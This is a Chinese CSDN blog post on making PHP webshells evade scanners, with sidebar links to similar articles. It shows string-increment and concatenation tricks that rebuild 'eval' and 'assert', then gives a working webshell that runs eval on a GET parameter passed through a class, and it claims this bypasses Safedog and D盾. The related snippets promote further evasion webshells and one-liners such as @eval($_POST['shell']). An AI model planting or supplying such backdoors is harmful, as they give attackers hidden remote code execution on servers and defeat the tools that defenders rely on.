php免杀

最新推荐文章于 2024-07-03 08:52:14 发布
最新推荐文章于 2024-07-03 08:52:14 发布
阅读量465 收藏 4
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45111459/article/details/118344938
版权

php中有一个有意思的特性,就是字符串也能使用自加运算符 ++

<?php
$a='evak';
$a++;
echo $a;

他的输出结果是

这是取字符串的最后一个字符转化为ascii码,加完后再转回字符

通过查询ascii码表得知 k 的ascii码值为107,自加后是108,再转回来就是l,得以拼接成eval

还有

$a='a'.'s'.'s';

$b='er'.ord(74)

什么,和我们前面的自加运算符,跟直接使用asseet是一样的

不要折腾在eval  assert的拼接上,安全狗和D盾不拦截php的语法和函数,应该着重于参数的传递

在php中使用类,序列化进行参数的传递,直接调用eval,assert就能免杀

<?php
class test{
    public $c;
    function __construct(){
        @$this->c=$_GET['id'];
    }
}
$cc=new test;
$cc=$cc->c;
eval($cc);

weixin_45111459
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
php后门文件的免杀总结
W小哥
03-12 651
参考网址:https://xz.aliyun.com/t/5152 一、函数eval 与函数 assert介绍 eval函数 eval 是一个语言构造器而不是一个函数,不能被可变函数调用 可变函数: 通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行。 通俗的说比如 <?php $a=eval;$a() ?> 这样是不行的,也...
自用php一句话木马绝对免杀没有任何关键字
热门推荐
不是专家的专栏
11-14 1万+
该代码是本人自己编写,可变性极大,基本不可能被查杀,代码里面没有任何关键字,而且很容易把代码弄的非常复杂。 使用方法: 1.在网站建立一个xxx.php,内容放入一句话代码。(这里是演示,xxx.php可以是任何可以访问的文件) 2.建立一个demo.html,内容如下 textarea里面写上任何想执行php的代码,注意代码格式必须规范。--> phpinfo(
shell 免杀aspx_避开eval关键字,打造免杀一句话木马
weixin_30304773的博客
01-16 1944
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
【木马免杀
一纸荒芜的博客
08-03 2938
木马免杀
深入探索PHP免杀技术及其防护策略
weixin_43822401的博客
07-03 425
免杀技术指的是通过各种手段修改或加密Webshell代码,使其不被安全软件识别的技术。这项技术在网络安全攻防演练中具有重要地位。D盾是一款专为IIS设计的主动防御保护软件,提供多种安全防护功能,包括一句话免疫、主动后门拦截等,以增强服务器的安全性。PHP免杀技术是网络安全领域中攻防双方技术较量的一部分。作为防御方,了解免杀技术的原理和实现方法对于加强防护至关重要。同时,通过采取有效的防护策略,可以显著提高Web应用的安全性,抵御免杀Webshell的威胁。
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1767
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
php免杀,PHP免杀webShell总结
weixin_32306175的博客
03-09 654
0x001 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧。0x002 eval()函数eval()是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行通俗的说比如你这样是不行的也造就了用eval的话达不到assert的灵活,但是在php7.1以上asser...
php一句话木马免杀
qq_58683895的博客
11-21 1730
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
php免杀大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
2016最新php免杀webshell过安全狗
03-05
【标题】"2016最新php免杀webshell过安全狗" 描述了这个压缩包文件中的PHP脚本能够避开安全狗等Web安全防护软件的检测,从而在2016年时被认为是可以成功上传并执行的Webshell。Webshell通常是指攻击者通过SQL注入、...
最新PHP免杀过狗免杀WAF2k大马shell
02-02
最新PHP免杀过狗免杀WAF2k大马shell/仅用于技术研究请勿非法使用
PHP过D盾免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
2017php免杀大马 过狗
02-19
才卖一个资源分了,密码123123
关于PHP的webshell免杀小结
小王的储物间
02-23 911
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
PHP一句话木马免杀
小刚的博客
07-26 6312
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 &lt.
记一次多平台免杀PHP木马的制作过程
icewolf00的博客
01-20 2211
最开始萌生出写免杀WebShell的想法是这个月初上网时,偶然看到了阿里安全应急响应平台的一则线上活动“第三届伏魔恶意代码挑战赛”的报名公告,大致看了一下之后发现该比赛的内容为编写PHPJSPPython或Bash语言的后门代码,若编写的代码通过了阿里最新一代检测引擎(即挑战靶场)的检测,并且不和别的师傅重复之后就算比赛通过了。鉴于我对PHP语言和网络安全方面较为了解,于是我就抱着试一试的心态报名了PHP赛道。在奋战了4天之后,我编写出了一个215。
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3128
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
webshell免杀的一些学习和思考——以PHP为例
闵行小鱼塘
10-24 1142
凡是使用webshell时,免杀都是需要考虑的事情,说白了就是我的webshell得能用啊!故本篇做一个webshell免杀的学习,主要是php的一句话
渗透测试web安全 - webshell 免杀 绕过waf总结
网络安全领域优质创作者
02-21 3042
在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。 小型网站常见的waf有: D盾 一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 云锁 云上的安全边界越来越模糊...
[毕业设计]VB+ACCESS高校班级日常管理系统(源代码+论文).zip
最新发布
08-07
[毕业设计]VB+ACCESS高校班级日常管理系统(源代码+论文)
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值